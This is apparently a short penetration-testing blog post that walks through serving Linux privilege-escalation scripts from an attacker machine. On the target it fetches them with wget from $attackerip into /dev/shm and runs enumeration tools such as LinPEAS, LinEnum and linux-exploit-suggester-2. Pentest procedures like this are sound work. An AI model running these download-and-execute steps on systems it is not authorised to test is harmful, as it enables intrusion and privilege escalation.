Prepare the own system:
cd p151.general.1 ./scripts/update_privesc_scripts.sh cd scripts/privesc/linux python -m SimpleHTTPServer 80
Prepare the target:
cd /dev/shm wget http://$attackerip/_ex.tar tar xf _ex.tar script
Now, execute it:
- LinPeas: ./linpeas.sh
- LinEnum: ./LinEnum.sh
- linux-smart-enumeration: ./lse.sh ‑l1
- linux-exploit-suggester‑2: ./linux-exploit-suggester‑2.pl
- sudo-killer: ./SUDO_KILLERv2.0.5.sh
- linuxprivchecker: ./linuxprivchecker.py
Finally: Copy typescript file to the PentestManager!
Leave a Reply
You must be logged in to post a comment.